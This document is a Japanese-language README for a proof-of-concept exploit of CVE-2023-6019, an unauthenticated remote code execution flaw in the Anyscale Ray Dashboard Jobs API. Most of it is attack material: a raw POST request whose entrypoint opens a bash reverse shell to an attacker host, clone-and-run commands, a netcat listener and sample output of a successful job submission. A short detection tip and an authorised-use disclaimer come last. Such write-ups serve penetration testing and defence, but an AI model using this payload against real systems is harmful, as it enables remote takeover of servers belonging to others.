
CVE-2023-6019 の PoC エクスプロイト。Anyscale Ray Dashboard の Jobs API を介した認証されていないリモートコード実行を標的とします。脆弱な Ray インスタンス (< 2.6.4) にリバースシェルを配信します。
CVE-2023-6019 の PoC エクスプロイト — 未認証の Ray Dashboard Jobs API を介したリモートコード実行。
作成者: oguiii
Anyscale Ray は、分散型 ML/AI ワークロードのためのオープンソースフレームワークです。2.6.4 より前のバージョンでは、Ray Dashboard(デフォルトポート 8265)を通じてジョブ提出 API が認証なしで公開されており、未認証の攻撃者は任意のジョブを提出して、ホスト上でリモートコード実行を達成できます。
/api/jobs/ エンドポイントは、entrypoint フィールドを含む JSON ペイロードを受け入れ、そのフィールドは Ray ワーカープロセスによってシェルコマンドとして実行されます — 認証情報は不要です。
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>
| Flag | 説明 | デフォルト |
|---|---|---|
-t | 対象の IP またはホスト名 | 必須 |
-p | Ray Dashboard のポート | 8265 |
-l | 攻撃者の IP(リバースシェル) | 必須 |
-lp | 攻撃者のポート(リバースシェル) | 必須 |
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019
[*] Target : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...
[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Make sure your listener is ready:
nc -lvnp 4444
HTTP ログまたはネットワークトラフィックで、ポート 8265 の /api/jobs/ に対する不審な POST リクエストを探してください。
このツールは認可されたペネトレーションテストおよび教育目的のみを意図しています。
作者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。
テスト前に必ず適切な書面による許可を取得してください。